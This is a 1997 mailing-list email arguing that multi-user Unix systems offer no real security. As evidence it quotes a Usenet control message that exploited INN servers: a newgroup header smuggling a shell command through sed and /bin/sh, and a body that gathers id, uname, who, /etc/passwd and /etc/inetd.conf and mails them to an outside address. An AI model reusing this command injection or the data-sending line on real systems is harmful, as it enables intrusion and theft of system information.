From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 10 Apr 1997 22:44:28 -0700 (PDT)
To: toto@sk.sympatico.ca
Subject: Re: store your private key on a multi-user system!  use pubkeys without verifying them!
In-Reply-To: <334DCC65.3409@sk.sympatico.ca>
Message-ID: <199704110543.AAA05165@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Toto wrote:
> Bryce wrote:
> > The non-cpunks that I talk to frequently say that "no bad guys
> > would bother to read my e-mail". 
> > as long as the value of reading your private e-mail is less than
> > the cost of reading it, you can consider yourself safe.
> 
>   Bad, bad assumption.
>  
> > So my points are as follows:
> 
> > 2.  To the cpunks:  the _value_ of invading your privacy is not that
> > high.  There are no evil storm troopers whose full time job is to run
> > a man-in-the-middle attack on your PGP public key, or dedicate a
> > cracking farm to decrypting your messages, or using TEMPEST devices
> > on your home computer or whatever.  Therefore, simply encrypting your
> > personal e-mail with a 512-bit PGP key, storing your private key on
> > your local multi-user Unix system, and using people's public keys
> > _without_ doing anti-Man-In-The-Middle techniques is more than
> > sufficient to protect your privacy.

The main mistake in the argument that you cited is the following:
it assumes that you know the cost of hacking and reading one's email
or files.

You do NOT know it. Moreover, while it is usually easy to find the upper
bound for that cost, the lower bound is not so obvious. Recall the 
latest attack on INN servers, when one trivial message (see below) could
be used to compromise thousands of internet sites, at the negligible
cost.

It is only safe to assume that the cost of breaking into a Unix system
(or any other server for that matter) is ZERO.

Unix security on multiuser machines is an oxymoron, it does not exist
and should never be assumed.

The problems with people actually securing their communications and
personal data are as follows:

1) It is costly to set up a more or less secure system (ie, a system
that is not a server and that is somewhat protected from various data
attacks) because of learning curve and other costs

2) Many if not most correspondents are so clueless they's never even 
understand what they need to do to secure their communications.

I had to drop several conversations with people because they were 
stupid/lazy enough not to set up PGP.

	- Igor.

Subject:      cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
From:         tale@uunet.uu.net (David C Lawrence)
Date:         1997/03/17
Message-Id:   <5gkdv8$5uc@tabloid.amoco.com>
Control:      newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Organization: Amoco
Newsgroups:   comp.sys.mac.printing
[Fewer Headers]

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info tafeyereisen@amoco.com
#-